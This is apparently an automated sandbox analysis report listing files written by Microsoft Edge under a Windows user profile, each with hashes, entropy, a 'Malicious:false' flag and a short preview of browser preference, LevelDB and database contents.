                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7d22092f-b8e3-4884-9e57-70507305b470.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):23309
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.226322098984803
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:stWPGQSu0sk0Pei4eYbGWQUJ2emxp7KB0AlNnUUtu9Vice/j9Q:sYOXuhPe5PbGlFemxp7KtM9y9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:2E67BCC8D0F38D04C4DD9EBAEAA743F2
                                                                                                                                                                                                                                                                                                                                                              SHA1:9DDF6EE27D2EB439A438670A9BBDCDA3D77F98DF
                                                                                                                                                                                                                                                                                                                                                              SHA-256:E0646F5A92138DC6FF74CF14F053A57AD03CF78125830E3FC270256D27176BF2
                                                                                                                                                                                                                                                                                                                                                              SHA-512:AA4F79A1BD336CADE8E43009AD66ADBF375C427C0682C02A8F29AC59505D4648CDFFF2121490A6C4CE00E58D52A6C91993689913210EA772EB077B48F5039412
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\987952d5-fc23-4b23-93a7-403458f2024d.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):18515
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.259217411038714
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:stWPGKSu0sk0Pei4eYbGWQJJ6QmxpJBvoiJMti9Viqq9Q:sYOxuhPe5PbGlOQmxpJfT9y9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:A6D1CB90652516168C7D92021331D60B
                                                                                                                                                                                                                                                                                                                                                              SHA1:30FE070CCFD04E3A1D34A0465277761D1B47292F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:295F50F7A058D3ECD7D29B08C98C3D37C6BCA4B8C7CD043E36F0EAC465D23E8B
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9A2D67371180DC4EEAD43259FE75324EC4D415E937C0014C5EC6A0B3E3367754EF093761308ABDBBC6E51214036D02F27A74A45E4695367F93F031BE2314B767
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):305
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.277046436490404
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfgAp1Fi23oH+Tcwtp3hBtB2KLl1f4DM+q2PFi23oH+Tcwtp3hBWsIFUv:7YApZYebp3dFLgM+vdZYebp3eFUv
                                                                                                                                                                                                                                                                                                                                                              MD5:FC1BB7FBC1E8B0169DC00C9AD4FAC46B
                                                                                                                                                                                                                                                                                                                                                              SHA1:199FF6D1604E0741F013F6A64A7BFF3F843E25FC
                                                                                                                                                                                                                                                                                                                                                              SHA-256:3A2F2F7FC530E4ABD51C88FCD4F4383AE3C6E2AD02A5341F31CE078F961B6563
                                                                                                                                                                                                                                                                                                                                                              SHA-512:95AC5B6AFBB07E39BF9EFF9AD404FF6AC5DA122118BD9E451A3BA9AE7D0A0242FA46FE298C6D2BA6F2D4CC43E635C2508CF356A971E4AF732D93E6CF5977A31B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:54.733 21fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/02/18-02:16:55.150 21fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.222890476774528
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:tZPeZpVMfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:tZWZpVMfx2mjF
                                                                                                                                                                                                                                                                                                                                                              MD5:9E302120A324EADA7FEF8113B72DBD96
                                                                                                                                                                                                                                                                                                                                                              SHA1:B2C51694DB6B8CFB5EFAF2011C05103BA0DEE499
                                                                                                                                                                                                                                                                                                                                                              SHA-256:D7188B7D3416C0B3529B5BFC89C03D861D0C7551FE6BB3556AEE96FDA0BE4657
                                                                                                                                                                                                                                                                                                                                                              SHA-512:12477F41EAE4800CD27F145A8D9A3372C7E2E7FA02D5BC2910BAD2388E0E5FA7A92E0DCF240BC4AF9E5A56C378B08DD7938230DB080E586A4D2596211DBBC798
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340972966846363.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):329
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2228280728017955
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfgTjyq2PFi23oH+Tcwt9Eh1tIFUtFfg+j1Zmw7fgWRkwOFi23oH+Tcwt9Eh1H:7YPyvdZYeb9Eh16FUt6+J/0WR5wZYebY
                                                                                                                                                                                                                                                                                                                                                              MD5:02C3518587C07C6270AF79D4641433D1
                                                                                                                                                                                                                                                                                                                                                              SHA1:7657A87F6249D7845B7A1BB872515EA940774DFB
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C418E2CF74DEBD1B4C8C94D3466B314C6A8C404BEF092860C1D8E56737F07329
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B3FE9878FF02BF5343443F52900E106E883FAB128995204E9328BF4B74D8CAADFF3FAE9FC47442C8BF36ADB9E0407A707E40D9A57DF78B5C89861BED430B76C
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:54.589 734 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/02/18-02:16:54.591 734 Recovering log #3.2025/02/18-02:16:54.597 734 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):329
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2228280728017955
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfgTjyq2PFi23oH+Tcwt9Eh1tIFUtFfg+j1Zmw7fgWRkwOFi23oH+Tcwt9Eh1H:7YPyvdZYeb9Eh16FUt6+J/0WR5wZYebY
                                                                                                                                                                                                                                                                                                                                                              MD5:02C3518587C07C6270AF79D4641433D1
                                                                                                                                                                                                                                                                                                                                                              SHA1:7657A87F6249D7845B7A1BB872515EA940774DFB
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C418E2CF74DEBD1B4C8C94D3466B314C6A8C404BEF092860C1D8E56737F07329
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B3FE9878FF02BF5343443F52900E106E883FAB128995204E9328BF4B74D8CAADFF3FAE9FC47442C8BF36ADB9E0407A707E40D9A57DF78B5C89861BED430B76C
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:54.589 734 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/02/18-02:16:54.591 734 Recovering log #3.2025/02/18-02:16:54.597 734 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.5099062698391121
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfB7L3Ema2pQU:TouQq3qh7z3bY2LNW9WMcUvB7zNf
                                                                                                                                                                                                                                                                                                                                                              MD5:92ABEB28C0B92CAA4011CC8148BC9218
                                                                                                                                                                                                                                                                                                                                                              SHA1:67C417633735F0B975276C908DDD6E88715EE2E0
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5D930A5C4CEDA6322C4E82C7D926F3A32B78251F9D28DF046A9383B86F877DB6
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9C7DBB010CB83B7817C0F914675746E5AC22D1E5CBE5B0368D37A86FEB41090247A4B85634E949E88119473EFA6D74B6F099BB880F0F1A682258F58FF804805E
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):668201
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.015599206008846
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:dOTxoKHgdiXgRqyPmEGKHMCv9i2+8tqYM+91TVbiJQSUv4z5CvXn4rJg9a:IqugIXz7EG2MCViIqYR1TJje53
                                                                                                                                                                                                                                                                                                                                                              MD5:8A78C4C7B0619F75412F61E5D6F18851
                                                                                                                                                                                                                                                                                                                                                              SHA1:306870F716139238841C5E89AAE559F08B6699E1
                                                                                                                                                                                                                                                                                                                                                              SHA-256:EDD8E08D71CD191F83154568CA87747F39EB1F863465900F25591BA9242F1F54
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9CCB21E67C1E187AFE35951C5081F3679D4E4E6FFD47A3188B2BF729E62A75D13BF3570BAA3EF8614BF2749CC2FD4E1F295043E967073080157803ED811125B4
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1.....................BLOOM_FILTER:..({"numberOfHashFunctions":8,"shiftBase":6,"bloomFilterArraySize":3957785,"primeBases":[5381,5381,5381,5381],"supportedDomains":"dZsnzzKOjGQLMS7JuG6O4fm8IQtJDIVRbkJfYFUXB5RvXDKZih44Q+jI1glfqWpU64USEMcaiiQvxGs5knzJkr2qjfT3aiGsXZNyq1FupGvkeVmgTygCDCSB11F76W2ttdpM+4/w+hFOHpMbUECVRTwQkRZC4keTKY6OG0eDZBhSv9JF+E9EG0wo6l5c4U/ryQJ2OOHaJkUenHnZMiE4Tj76sK8GBnWlTJrt8f5w/+yHaafqYwDdapAqfluXa2Sc7ykqpFoLRcQhoNFVEKTpANC5g8efT+ARnbprDJl4ZZFvcUY4HAH9qX51rdDvnkN92xI3pF4zOzEWrUiAgP395Gg1waOIp8By4ph/JX1yL/LTTFNYpbMaTUE+5hOLVolRzquIfkWejtxLOoTCVSzNEBMyz9tTWjIY2wJIb8V5TzZoTggEcYl3PLJdRHH910ljbhqmJmY/r3SYBlmRFtnSnzQ1HkxCgSmyn8T8akozBmrLgbymEQr8GDsAIGXLEm1IMraPo6dqKUM61whCCfmeDjtndJp2W9+aefGAXwTOVk7na8Imn6KqedPRzgalw7lSy0YqXuAxHIDklUZVwp4eqbqh3vItcEKDjWNN90MyIpCc/ZrZHg/aRL1G2ydEiaJUg3C8Fxf/yzmlhl4JTx29dSXLFxYxzThTKhPfPHMgGWRpb2iblUc+EcYC1c8emNi82zqCME9tYS0GsCE1OOLBBrrwmmEkck07KxfAcoKlQRCuNIabWhsyPzQYDbvsntj5ECSZjnQ6rbTqpTosa8i8HHicvDeE43xCpYR

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):225
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.434849930031017
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:ulkG38D8xSEsIjlDdvm9+n0PxEWNcHCX9Zjzf9qjX1HSaLZf9:ulfMD/QjlDz0TNcHyXeFHhX
                                                                                                                                                                                                                                                                                                                                                              MD5:DFFAF68AACFD580F7BA2CCE1C561A809
                                                                                                                                                                                                                                                                                                                                                              SHA1:BC055718D931AEE5562F3F8B8936BAB42389100F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:97332CD07A084190CE46C9B407535765600960202907E0D965E9ED4C7B9137F1
                                                                                                                                                                                                                                                                                                                                                              SHA-512:0D11AE86CDFFFAF4A77BB9503BB318572877559E866B38A590F889FEEC8561BB5F1B112C2197A4A91A447739AFB85606A3D8DFAA037AFE7E6EE00E64A075E15B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:....9................BLOOM_FILTER_EXPIRY_TIME:.1739949411.627441.8JAG................BLOOM_FILTER_LAST_MODIFIED:.Mon, 17 Feb 2025 21:33:44 GMT....L................FLYOUT_STORAGE:.{"personalization_data_consent_enabled":false}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):668169
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.014871485942242
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:lOTxEKSgDiXiRqyPmEGCH2CvU42+8tdXM+9TTVbyJQSyL4zKuvXn2rJ692:ASRgWXZ7EGe2Cs4IdXRTTJ3SyF
                                                                                                                                                                                                                                                                                                                                                              MD5:6CC919E9144F8898434A197FEA7F79F5
                                                                                                                                                                                                                                                                                                                                                              SHA1:BDEBBAEEF9EF4688C0F3AB578622EF50146B97EC
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C33A8038A2BD9A00784610C62A7C878EB6EF91BC27DF4CF2E344E84199D1589B
                                                                                                                                                                                                                                                                                                                                                              SHA-512:BAC18E1133CAD3A4DA96445C4CF989968068C9B44C9A85E1B3D0A49F0B27550282BDD0465CE1D1936D0AED65609B07E4C234F6509B7E2FDBA4B1ECEE7EB05842
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
